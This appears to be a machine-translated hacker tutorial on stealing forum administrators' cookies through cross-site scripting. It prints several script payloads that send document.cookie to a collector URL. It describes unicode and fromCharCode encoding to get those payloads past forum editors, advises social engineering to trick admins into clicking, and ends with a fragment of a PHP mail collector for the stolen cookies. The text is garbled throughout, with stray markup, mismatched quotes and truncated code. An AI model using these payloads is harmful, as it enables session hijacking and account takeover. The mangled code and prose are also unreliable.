For example, if you find a place where XSS is possible:
<script>alert (just pop it up no matter what)</script>
Get a cookie-stealing file yourself.
The purpose is to let other viewers browse the traps we designed
<script>document.location=http://URL.com/cookie.php?cookie='+escape(document.cookie) < ;/script><br><br>In fact, I don’t need to say more about how to do it. . <br><br>Now we are mainly talking about how to hide JavaScript execution. <br><br>You may be used to going to milw0rm.com every day to see EXP, <br><br>Every time the EXP of XSS vulnerability is released, when we exploit it. <br><br>But I can’t cookie any information, why is that? . <br><br>Large forums like Magic and PHPBB all have XSS vulnerabilities. <br><br>I gave this <br><script>document.location=http://URL.com/cookie.php?cookie='+escape(document.cookie) </script>
Javascript will be displayed mistake.
There are two solutions. We can encode external sensitive information in unicode
Give a URL: http://www.mikezilla.com/exp0012.html
This is how it is encoded:
<script>eval( location.href="http://www.php1.cn/"><br>If the above does not work, use the second method<br><br>The eval function in Javascript fromCharCode<br><br>As mentioned above, some websites can be encoded with unicode<br><br> For example, the encoded 104, 116, 116, and 112 are HTTP<br><br>If the forum uses other editors, such as the WYSIWYG editor used by PHPWind<br><br>It will definitely be exposed by directly typing http://url.com<br><br>. Then we will change the URL according to the format of the editor<br><br>For example, the site that steals COOKIE is http://www.URL.com<br><br>We will do this<br>http://www.url.com<br><br>Of course you will see the displayed part It can be replaced with attractive information to defraud management and clicks <br><br> Just use a little social engineering <br><br>Now that the initial idea is completed, let’s start implementing it <br><br>Step 1: Management sees our structure. Good trap, and clicked him<br><br>Step 2: Javascript was executed successfully. <br><br>Step 3: Constructed stolen COOKIE file to steal Cookie<br><br>Step 4: We can’t be stupid enough to connect to the URL. It is plain text, and the URL is encoded in Unicode (it is customary to say it is encrypted here) http://www.mikezilla.com/exp0012.html<br><br>Step 5: The intercepted cookie information is of course not in clear text, we only need to use FireFox Cookie Edit It's OK to replace COOKIE with <br>, or use other tools such as CookieEditor. <br><br>Personal suggestion: To steal cookies, you don't necessarily need to use space to collect cookie information. For example, just create a mailbox to collect it. @hotmail.com","cookie monster",$_REQUEST[cookie]);<br><br>?><br><html><br><script>document.location=http://www.URL.com/' ;</script>
